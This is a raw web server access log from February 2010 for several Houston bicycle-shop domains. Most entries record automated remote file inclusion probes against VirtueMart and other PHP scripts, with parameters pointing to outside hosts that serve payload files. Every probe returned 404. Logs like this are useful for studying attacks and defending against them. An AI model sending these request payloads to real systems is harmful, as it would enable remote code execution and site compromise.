65.55.207.121 - - [10/Feb/2010:09:48:36 -0800] "GET /riderready/index.html HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "svbikes.com"
125.141.91.138 - - [10/Feb/2010:09:49:02 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:09:49:02 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:09:49:02 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:09:49:02 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:09:49:02 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:09:49:02 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:09:49:07 -0800] "GET /translations/Portuguese_BR.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:09:49:07 -0800] "GET /translations/Portuguese_BR.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:09:52:15 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:09:52:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:09:52:15 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
210.116.103.118 - - [10/Feb/2010:09:55:56 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.116.103.118 - - [10/Feb/2010:09:56:04 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.116.103.118 - - [10/Feb/2010:09:56:04 -0800] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:09:56:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:09:56:47 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:09:56:47 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:09:59:05 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:09:59:05 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:10:00:07 -0800] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [10/Feb/2010:10:00:07 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
125.141.91.138 - - [10/Feb/2010:10:00:17 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:10:00:17 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:10:02:49 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:10:02:49 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:10:02:49 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:10:02:54 -0800] "GET /logs/scripts.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [10/Feb/2010:10:02:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [10/Feb/2010:10:02:54 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
87.106.134.174 - - [10/Feb/2010:10:03:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:10:03:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:10:03:12 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.126.254.164 - - [10/Feb/2010:10:03:17 -0800] "GET /logs/access.log/bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "houstonbikeshop.com"
209.126.254.164 - - [10/Feb/2010:10:03:17 -0800] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "houstonbikeshop.com"
209.126.254.164 - - [10/Feb/2010:10:03:17 -0800] "GET /logs/bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "houstonbikeshop.com"
67.195.115.243 - - [10/Feb/2010:10:03:34 -0800] "GET /tmp/?D=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
85.13.139.254 - - [10/Feb/2010:10:05:24 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:10:05:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:10:05:24 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.93.50.11 - - [10/Feb/2010:10:06:24 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.93.50.11 - - [10/Feb/2010:10:06:24 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.93.50.11 - - [10/Feb/2010:10:06:24 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.93.50.11 - - [10/Feb/2010:10:06:33 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.93.50.11 - - [10/Feb/2010:10:06:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.93.50.11 - - [10/Feb/2010:10:06:36 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:10:06:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
87.106.134.174 - - [10/Feb/2010:10:06:56 -0800] "GET /logs/scripts.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
87.106.134.174 - - [10/Feb/2010:10:06:56 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [10/Feb/2010:10:07:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:10:07:24 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:10:07:24 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:10:07:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [10/Feb/2010:10:07:35 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.13.139.254 - - [10/Feb/2010:10:07:35 -0800] "GET /logs/scripts.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.229 - - [10/Feb/2010:10:07:43 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:10:07:43 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:10:07:43 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:10:08:11 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:10:08:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.13.139.254 - - [10/Feb/2010:10:08:11 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:10:11:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
87.106.134.174 - - [10/Feb/2010:10:11:55 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
87.106.134.174 - - [10/Feb/2010:10:11:55 -0800] "GET /logs/scripts.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
87.106.134.174 - - [10/Feb/2010:10:12:08 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
87.106.134.174 - - [10/Feb/2010:10:12:08 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
87.106.134.174 - - [10/Feb/2010:10:12:08 -0800] "GET /logs/scripts.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
80.93.50.11 - - [10/Feb/2010:10:14:41 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:15:07 -0800] "GET /bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:15:07 -0800] "GET /logs//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:15:12 -0800] "GET /logs/access.log//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:15:28 -0800] "GET /bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:15:28 -0800] "GET /logs//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:15:33 -0800] "GET /logs/access.log//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.93.50.11 - - [10/Feb/2010:10:16:25 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:10:16:30 -0800] "GET /logs//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:10:16:30 -0800] "GET /logs/access.log//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:10:16:31 -0800] "GET /bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:10:16:57 -0800] "GET /logs/access.log//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:10:16:57 -0800] "GET /logs//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:10:16:57 -0800] "GET /bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:10:17:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.229 - - [10/Feb/2010:10:17:33 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.50.85.229 - - [10/Feb/2010:10:17:33 -0800] "GET /logs/scripts.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
85.25.26.87 - - [10/Feb/2010:10:19:09 -0800] "GET /bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:10:19:09 -0800] "GET /logs//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:10:19:14 -0800] "GET /logs/access.log//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
118.217.216.132 - - [10/Feb/2010:10:19:26 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
118.217.216.132 - - [10/Feb/2010:10:19:26 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
118.217.216.132 - - [10/Feb/2010:10:19:26 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
118.217.216.132 - - [10/Feb/2010:10:19:29 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://imran-project.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
118.217.216.132 - - [10/Feb/2010:10:19:29 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://imran-project.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
118.217.216.132 - - [10/Feb/2010:10:19:29 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://imran-project.com/css/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:20:12 -0800] "GET /bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:20:12 -0800] "GET /logs//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:20:12 -0800] "GET /logs/access.log//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:20:13 -0800] "GET /bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:20:13 -0800] "GET /logs/access.log//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:20:13 -0800] "GET /logs//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.250.252.242 - - [10/Feb/2010:10:20:28 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
80.93.50.11 - - [10/Feb/2010:10:21:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
80.93.50.11 - - [10/Feb/2010:10:21:01 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
80.93.50.11 - - [10/Feb/2010:10:21:01 -0800] "GET /logs/scripts.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
208.93.149.176 - - [10/Feb/2010:10:21:52 -0800] "GET /bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:21:52 -0800] "GET /logs//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:21:52 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:10:24:17 -0800] "GET /bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:10:24:17 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
